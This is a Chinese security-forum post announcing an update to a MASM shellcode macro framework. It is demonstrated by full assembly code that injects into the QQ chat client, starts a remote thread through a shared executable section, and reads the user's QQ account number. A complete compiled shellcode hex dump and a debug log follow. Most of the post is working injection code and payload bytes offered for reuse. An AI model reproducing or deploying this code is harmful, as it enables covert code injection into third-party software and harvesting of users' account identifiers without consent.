[原创]MAsM ShellCode 宏框架更新-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]MAsM ShellCode 宏框架更新

发表于: 2013-1-6 00:49 5136

[原创]MAsM ShellCode 宏框架更新

Mx￠Xgt

2013-1-6 00:49

5136

之前写的版本有问题,更新了一下,主要是修复部分问题,增加了调试输出模式,还可以ShellCode 中编写ShellCode ,比如ShellCode 中还需要将一个ShellCode 注入到另一个程序
下面通过远程注入代码获取QQ号的例子来演示使用方法,具体用法有时间更新;

代码预览:

.386
.model flat, stdcall
option casemap :none

include windows.inc
includelib user32.lib
include myMacro.asm
injectCode proto
.CODE
DeBug = 1 ;调试模式,会增大体积,发行时请注释掉
; SHELLCODE 新构架 设置导入表,注意,这里都不用双引号
Import	MyIAT,		Kernel32,GetModuleHandleA,GetProcAddress,Process32First,CreateToolhelp32Snapshot,lstrcmpiA,Process32Next,CloseHandle,\
		CreateRemoteThread,OpenProcess,LoadLibraryA,WaitForSingleObject,GetExitCodeThread,CreateFileMappingA,GetCurrentProcessId
Import  MyIAT,		Kernel32,RtlMoveMemory,OutputDebugStringA
Import	MyIAT,		ntdll,NtMapViewOfSection
Import	MyIAT,		user32,wsprintfA

Import	injectIAT,	Kernel32,GetModuleHandleA,GetProcAddress

jmp	START
injectCode proc
%echo injectCode,__GetBuffSize__,num2str(__GetBuffSize__(injectIAT))
local APIArrayBuff[__GetBuffSize__(injectIAT)]:DWORD 
LdrImport injectIAT,APIArrayBuff  ;载入所有导入表中的APi
ImportApiCall GetModuleHandleA,"KernelUtil.dll"
.if eax
	ImportApiCall GetProcAddress,eax,"?GetSelfUin@Contact@Util@@YAKXZ"
	.if	eax
		call	eax ; get qq num  return eax
		ret
	.endif
.endif
xor	eax,eax
injectCode endp
injectCodeEnd:
injectCodelen = injectCodeEnd-injectCode
START proc 
local APIArrayBuff[__GetBuffSize__(MyIAT)]:DWORD 	;设置一个API缓冲区,可以使用常量__APiNumber__
LOCAL  info:PROCESSENTRY32
LOCAL  handle:HANDLE
LOCAL	 hProcess1:HANDLE,hProcess2:HANDLE
local	 hMappedFile:HANDLE,ViewBase1:DWORD,ViewBase2:DWORD,ViewSize:DWORD,radr:dword
LOCAL hRemoteThread:dword,Return_Value:dword
local @QQUid[16]:BYTE 
%echo MyIAT,__GetBuffSize__,num2str(__GetBuffSize__(MyIAT))
pushad
LdrImport MyIAT,APIArrayBuff  ;载入所有导入表中的API
mov	ViewSize,1024*4
ImportApiCall CreateFileMappingA, INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE , 0, 1024*4, NULL
mov	hMappedFile,eax
ImportApiCall GetCurrentProcessId
ImportApiCall OpenProcess, PROCESS_ALL_ACCESS,FALSE,eax
mov	hProcess2,eax
and	ViewBase2,0 ;在win7不清空会出错
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
.if eax>=0
	BaseRelocations eax
	lea	eax,[offset injectCode + eax] ;别忘了重定位
	mov	radr,eax
	ImportApiCall RtlMoveMemory,ViewBase2,radr,injectCodelen
	ImportApiCall CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ;进程快照
	mov    handle,eax
	mov    info.dwSize,sizeof PROCESSENTRY32
	ImportApiCall Process32First,handle,addr info
	.repeat
		ImportApiCall lstrcmpiA,addr info.szExeFile,"QQ.exe" ;比较是否为我们要找的进程名，不区分大小写
		.if !eax
		ImportApiCall OpenProcess,4095, 0,info.th32ProcessID
			 .if eax
			 mov	hProcess1,eax
			 and	ViewBase1,0
			 mov	ViewSize,1024*4
			 ImportApiCall NtMapViewOfSection,hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
	
				 .if eax>=0
				 ImportApiCall CreateRemoteThread,hProcess1,0,0,ViewBase1,0,0,0
				 	.if eax
				 		mov	hRemoteThread,eax
				 		ImportApiCall WaitForSingleObject,hRemoteThread, INFINITE
				 		ImportApiCall GetExitCodeThread,hRemoteThread, addr Return_Value
				 		push	esi
				 		mov	esi,esp
				 		ImportApiCall wsprintfA,addr @QQUid,"获取到QQ号:%d",Return_Value
				 		ImportApiCall OutputDebugStringA,addr @QQUid
				 		mov	esp,esi
				 		pop	esi
				 		ImportApiCall CloseHandle,hRemoteThread
				 	.endif
				 .endif
			  ImportApiCall CloseHandle,hProcess1
			 .endif	
		
		.endif
		ImportApiCall Process32Next,handle,addr info
	.until !eax
	ImportApiCall CloseHandle,handle
.endif
	ImportApiCall CloseHandle,hProcess2
	

popad
ret
START endp	
end START

下面是调试输出模式的shellcode:

E9 E2 02 00 00 55 8B EC 83 C4 F8 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40 D1 E0 40 C1 E0 04
8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44
10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B
3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4
08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C
6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C
65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75 74 44 65 62 75 67
53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00 00 44 65 62 75 67
20 6D 6F 64 65 21 00 FF 54 24 14 E8 0A 00 00 00 4B 65 72 6E 65 6C 33 32 00 02 5E E8 20 00 00 00
47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00
5F B9 01 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68 8B D8
56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24 08 89
44 8D F8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66 61 69
6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01 59 49
0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61 6D 65
3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C 24 08
B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 60 E8 30 00 00 00 69 6E 6A 65 63 74 49 41
54 3A 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 09 09 09 28 22 4B 65 72 6E 65 6C 55 74 69
6C 2E 64 6C 6C 22 29 00 FF 55 00 61 E8 0F 00 00 00 4B 65 72 6E 65 6C 55 74 69 6C 2E 64 6C 6C 00
FF 55 F8 0B C0 74 7E 60 E8 43 00 00 00 69 6E 6A 65 63 74 49 41 54 3A 47 65 74 50 72 6F 63 41 64
64 72 65 73 73 09 09 09 28 65 61 78 2C 22 3F 47 65 74 53 65 6C 66 55 69 6E 40 43 6F 6E 74 61 63
74 40 55 74 69 6C 40 40 59 41 4B 58 5A 22 29 00 FF 55 00 61 E8 20 00 00 00 3F 47 65 74 53 65 6C
66 55 69 6E 40 43 6F 6E 74 61 63 74 40 55 74 69 6C 40 40 59 41 4B 58 5A 00 50 FF 55 FC 0B C0 74
04 FF D0 C9 C3 33 C0 55 8B EC 81 C4 58 FE FF FF 60 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40
D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B
D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65
73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48
18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04
E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65
74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75
74 44 65 62 75 67 53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00
00 44 65 62 75 67 20 6D 6F 64 65 21 00 FF 54 24 14 E8 23 00 00 00 4B 65 72 6E 65 6C 33 32 00 0E
4B 65 72 6E 65 6C 33 32 00 02 6E 74 64 6C 6C 00 01 75 73 65 72 33 32 00 01 5E E8 23 01 00 00 47
65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 50
72 6F 63 65 73 73 33 32 46 69 72 73 74 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E
61 70 73 68 6F 74 00 6C 73 74 72 63 6D 70 69 41 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 43
6C 6F 73 65 48 61 6E 64 6C 65 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 00 4F 70
65 6E 50 72 6F 63 65 73 73 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 61 69 74 46 6F 72 53 69
6E 67 6C 65 4F 62 6A 65 63 74 00 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 43 72 65
61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73
73 49 64 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 4F 75 74 70 75 74 44 65 62 75 67 53 74 72
69 6E 67 41 00 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 77 73 70 72 69 6E 74 66
41 00 5F B9 04 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68
8B D8 56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24
08 89 44 8D B8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66
61 69 6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01
59 49 0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61
6D 65 3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C
24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 C7 85 74 FE FF FF 00 10 00 00 60 E8
5C 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 09 09 09 28
49 4E 56 41 4C 49 44 5F 48 41 4E 44 4C 45 5F 56 41 4C 55 45 2C 4E 55 4C 4C 2C 50 41 47 45 5F 45
58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 2C 30 2C 31 30 32 34 2A 34 2C 4E 55 4C 4C 29 00
FF 55 00 61 6A 00 68 00 10 00 00 6A 00 6A 40 6A 00 6A FF FF 55 E8 89 85 80 FE FF FF 60 E8 1F 00
00 00 4D 79 49 41 54 3A 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64 09 09 09 28 29
00 FF 55 00 61 FF 55 EC 60 E8 33 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63 65 73 73 09
09 09 28 50 52 4F 43 45 53 53 5F 41 4C 4C 5F 41 43 43 45 53 53 2C 46 41 4C 53 45 2C 65 61 78 29
00 FF 55 00 61 50 6A 00 68 FF 0F 1F 00 FF 55 D8 89 85 84 FE FF FF 83 A5 78 FE FF FF 00 60 E8 71
00 00 00 4D 79 49 41 54 3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68
4D 61 70 70 65 64 46 69 6C 65 2C 68 50 72 6F 63 65 73 73 32 2C 61 64 64 72 20 56 69 65 77 42 61
73 65 32 2C 30 2C 30 2C 30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45
5F 45 58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85
74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 78 FE FF FF 50 FF B5 84 FE FF FF FF B5 80 FE FF FF FF 55
F8 83 F8 00 0F 82 16 05 00 00 E8 00 00 00 00 81 2C 24 CF 17 40 00 58 8D 80 05 10 40 00 89 85 70
FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 09 09 09 28
56 69 65 77 42 61 73 65 32 2C 72 61 64 72 2C 69 6E 6A 65 63 74 43 6F 64 65 6C 65 6E 29 00 FF 55
00 61 68 E2 02 00 00 FF B5 70 FE FF FF FF B5 78 FE FF FF FF 55 F0 60 E8 38 00 00 00 4D 79 49 41
54 3A 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 09 09 09 28 54 48
33 32 43 53 5F 53 4E 41 50 50 52 4F 43 45 53 53 2C 30 29 00 FF 55 00 61 6A 00 6A 02 FF 55 C4 89
85 8C FE FF FF C7 85 90 FE FF FF 28 01 00 00 60 E8 2A 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65
73 73 33 32 46 69 72 73 74 09 09 09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF
55 00 61 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 C0 60 E8 31 00 00 00 4D 79 49 41 54 3A 6C
73 74 72 63 6D 70 69 41 09 09 09 28 61 64 64 72 20 69 6E 66 6F 2E 73 7A 45 78 65 46 69 6C 65 2C
22 51 51 2E 65 78 65 22 29 00 FF 55 00 61 E8 07 00 00 00 51 51 2E 65 78 65 00 8D 85 B4 FE FF FF
50 FF 55 C8 0B C0 0F 85 39 03 00 00 60 E8 30 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63
65 73 73 09 09 09 28 34 30 39 35 2C 30 2C 69 6E 66 6F 2E 74 68 33 32 50 72 6F 63 65 73 73 49 44
29 00 FF 55 00 61 FF B5 98 FE FF FF 6A 00 68 FF 0F 00 00 FF 55 D8 0B C0 0F 84 E7 02 00 00 89 85
88 FE FF FF 83 A5 7C FE FF FF 00 C7 85 74 FE FF FF 00 10 00 00 60 E8 71 00 00 00 4D 79 49 41 54
3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68 4D 61 70 70 65 64 46 69
6C 65 2C 68 50 72 6F 63 65 73 73 31 2C 61 64 64 72 20 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45 5F 45 58 45 43 55 54 45
5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A
00 6A 00 8D 85 7C FE FF FF 50 FF B5 88 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 0F 82 F0 01
00 00 60 E8 3B 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64
09 09 09 28 68 50 72 6F 63 65 73 73 31 2C 30 2C 30 2C 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 29 00 FF 55 00 61 6A 00 6A 00 6A 00 FF B5 7C FE FF FF 6A 00 6A 00 FF B5 88 FE FF FF FF 55 D4
0B C0 0F 84 8A 01 00 00 89 85 6C FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 57 61 69 74 46 6F
72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72 65 61 64 2C 49
4E 46 49 4E 49 54 45 29 00 FF 55 00 61 6A FF FF B5 6C FE FF FF FF 55 E0 60 E8 3C 00 00 00 4D 79
49 41 54 3A 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 09 09 09 28 68 52 65 6D 6F 74 65
54 68 72 65 61 64 2C 61 64 64 72 20 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 8D 85
68 FE FF FF 50 FF B5 6C FE FF FF FF 55 E4 56 8B F4 60 E8 3D 00 00 00 4D 79 49 41 54 3A 77 73 70
72 69 6E 74 66 41 09 09 09 28 61 64 64 72 20 40 51 51 55 69 64 2C 22 BB F1 C8 A1 B5 BD 51 51 BA
C5 3A 25 64 22 2C 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 FF B5 68 FE FF FF E8 0E
00 00 00 BB F1 C8 A1 B5 BD 51 51 BA C5 3A 25 64 00 8D 85 58 FE FF FF 50 FF 55 FC 60 E8 29 00 00
00 4D 79 49 41 54 3A 4F 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6E 67 41 09 09 09 28 61 64 64
72 20 40 51 51 55 69 64 29 00 FF 55 00 61 8D 85 58 FE FF FF 50 FF 55 F4 8B E6 5E 60 E8 24 00 00
00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72
65 61 64 29 00 FF 55 00 61 FF B5 6C FE FF FF FF 55 D0 60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C
6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63 65 73 73 31 29 00 FF 55 00 61 FF B5 88 FE
FF FF FF 55 D0 60 E8 29 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65 73 73 33 32 4E 65 78 74 09 09
09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF 55 00 61 8D 85 90 FE FF FF 50 FF
B5 8C FE FF FF FF 55 CC 0B C0 0F 85 23 FC FF FF 60 E8 1D 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73
65 48 61 6E 64 6C 65 09 09 09 28 68 61 6E 64 6C 65 29 00 FF 55 00 61 FF B5 8C FE FF FF FF 55 D0
60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63
65 73 73 32 29 00 FF 55 00 61 FF B5 84 FE FF FF FF 55 D0 61 C9 C3

调试输出信息,请用debugview查看:

00000004 10.53667545 [5112] Debug mode!
00000005 10.53904152 [5112] MyIAT:CreateFileMappingA (INVALID_HANDLE_VALUE,NULL,PAGE_EXECUTE_READWRITE,0,1024*4,NULL)
00000006 10.53908825 [5112] MyIAT:GetCurrentProcessId ()
00000007 10.53913784 [5112] MyIAT:OpenProcess (PROCESS_ALL_ACCESS,FALSE,eax)
00000008 10.53917313 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000009 10.53923798 [5112] MyIAT:RtlMoveMemory (ViewBase2,radr,injectCodelen)
00000010 10.53926563 [5112] MyIAT:CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0)
00000011 10.54169750 [5112] MyIAT:Process32First (handle,addr info)
00000012 10.54172421 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000013 10.54194260 [5112] MyIAT:Process32Next (handle,addr info)
00000014 10.54199123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000015 10.54202461 [5112] MyIAT:Process32Next (handle,addr info)
00000016 10.54206276 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000017 10.54209423 [5112] MyIAT:Process32Next (handle,addr info)
00000018 10.54213047 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000019 10.54216290 [5112] MyIAT:Process32Next (handle,addr info)
00000020 10.54220104 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000021 10.54223156 [5112] MyIAT:Process32Next (handle,addr info)
00000022 10.54226780 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000023 10.54229736 [5112] MyIAT:Process32Next (handle,addr info)
00000024 10.54233360 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000025 10.54236412 [5112] MyIAT:Process32Next (handle,addr info)
00000026 10.54240036 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000027 10.54243088 [5112] MyIAT:Process32Next (handle,addr info)
00000028 10.54246712 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000029 10.54249859 [5112] MyIAT:Process32Next (handle,addr info)
00000030 10.54253387 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000031 10.54256439 [5112] MyIAT:Process32Next (handle,addr info)
00000032 10.54260063 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000033 10.54263020 [5112] MyIAT:Process32Next (handle,addr info)
00000034 10.54266548 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000035 10.54269600 [5112] MyIAT:Process32Next (handle,addr info)
00000036 10.54273129 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000037 10.54276276 [5112] MyIAT:Process32Next (handle,addr info)
00000038 10.54279709 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000039 10.54282856 [5112] MyIAT:Process32Next (handle,addr info)
00000040 10.54286480 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000041 10.54293251 [5112] MyIAT:Process32Next (handle,addr info)
00000042 10.54296970 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000043 10.54300022 [5112] MyIAT:Process32Next (handle,addr info)
00000044 10.54304123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000045 10.54307461 [5112] MyIAT:Process32Next (handle,addr info)
00000046 10.54310989 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000047 10.54313946 [5112] MyIAT:Process32Next (handle,addr info)
00000048 10.54317570 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000049 10.54320717 [5112] MyIAT:Process32Next (handle,addr info)
00000050 10.54324436 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000051 10.54327393 [5112] MyIAT:Process32Next (handle,addr info)
00000052 10.54330921 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000053 10.54333973 [5112] MyIAT:Process32Next (handle,addr info)
00000054 10.54337502 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000055 10.54340553 [5112] MyIAT:Process32Next (handle,addr info)
00000056 10.54344177 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000057 10.54347229 [5112] MyIAT:Process32Next (handle,addr info)
00000058 10.54350662 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000059 10.54353809 [5112] MyIAT:Process32Next (handle,addr info)
00000060 10.54357433 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000061 10.54360485 [5112] MyIAT:Process32Next (handle,addr info)
00000062 10.54364014 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000063 10.54367065 [5112] MyIAT:Process32Next (handle,addr info)
00000064 10.54370689 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000065 10.54373550 [5112] MyIAT:Process32Next (handle,addr info)
00000066 10.54377079 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000067 10.54380226 [5112] MyIAT:Process32Next (handle,addr info)
00000068 10.54383755 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000069 10.54386806 [5112] MyIAT:Process32Next (handle,addr info)
00000070 10.54390335 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000071 10.54393291 [5112] MyIAT:Process32Next (handle,addr info)
00000072 10.54396820 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000073 10.54399872 [5112] MyIAT:Process32Next (handle,addr info)
00000074 10.54427528 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000075 10.54431629 [5112] MyIAT:Process32Next (handle,addr info)
00000076 10.54435539 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000077 10.54438496 [5112] MyIAT:Process32Next (handle,addr info)
00000078 10.54442024 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000079 10.54445171 [5112] MyIAT:Process32Next (handle,addr info)
00000080 10.54448795 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000081 10.54451752 [5112] MyIAT:Process32Next (handle,addr info)
00000082 10.54455280 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000083 10.54458332 [5112] MyIAT:Process32Next (handle,addr info)
00000084 10.54461861 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000085 10.54464912 [5112] MyIAT:Process32Next (handle,addr info)
00000086 10.54468441 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000087 10.54471493 [5112] MyIAT:Process32Next (handle,addr info)
00000088 10.54475021 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000089 10.54477978 [5112] MyIAT:Process32Next (handle,addr info)
00000090 10.54481506 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000091 10.54484558 [5112] MyIAT:Process32Next (handle,addr info)
00000092 10.54488277 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000093 10.54491138 [5112] MyIAT:Process32Next (handle,addr info)
00000094 10.54494762 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000095 10.54497719 [5112] MyIAT:Process32Next (handle,addr info)
00000096 10.54501247 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000097 10.54504395 [5112] MyIAT:Process32Next (handle,addr info)
00000098 10.54507923 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000099 10.54510880 [5112] MyIAT:Process32Next (handle,addr info)
00000100 10.54514408 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000101 10.54517365 [5112] MyIAT:Process32Next (handle,addr info)
00000102 10.54521084 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000103 10.54524136 [5112] MyIAT:Process32Next (handle,addr info)
00000104 10.54527664 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000105 10.54530716 [5112] MyIAT:Process32Next (handle,addr info)
00000106 10.54534245 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000107 10.54537201 [5112] MyIAT:Process32Next (handle,addr info)
00000108 10.54540825 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000109 10.54543972 [5112] MyIAT:Process32Next (handle,addr info)
00000110 10.54547501 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000111 10.54550457 [5112] MyIAT:Process32Next (handle,addr info)
00000112 10.54554081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000113 10.54557037 [5112] MyIAT:Process32Next (handle,addr info)
00000114 10.54560471 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000115 10.54563618 [5112] MyIAT:Process32Next (handle,addr info)
00000116 10.54567146 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000117 10.54570198 [5112] MyIAT:Process32Next (handle,addr info)
00000118 10.54573727 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000119 10.54576683 [5112] MyIAT:Process32Next (handle,addr info)
00000120 10.54580212 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000121 10.54583263 [5112] MyIAT:Process32Next (handle,addr info)
00000122 10.54586792 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000123 10.54589844 [5112] MyIAT:Process32Next (handle,addr info)
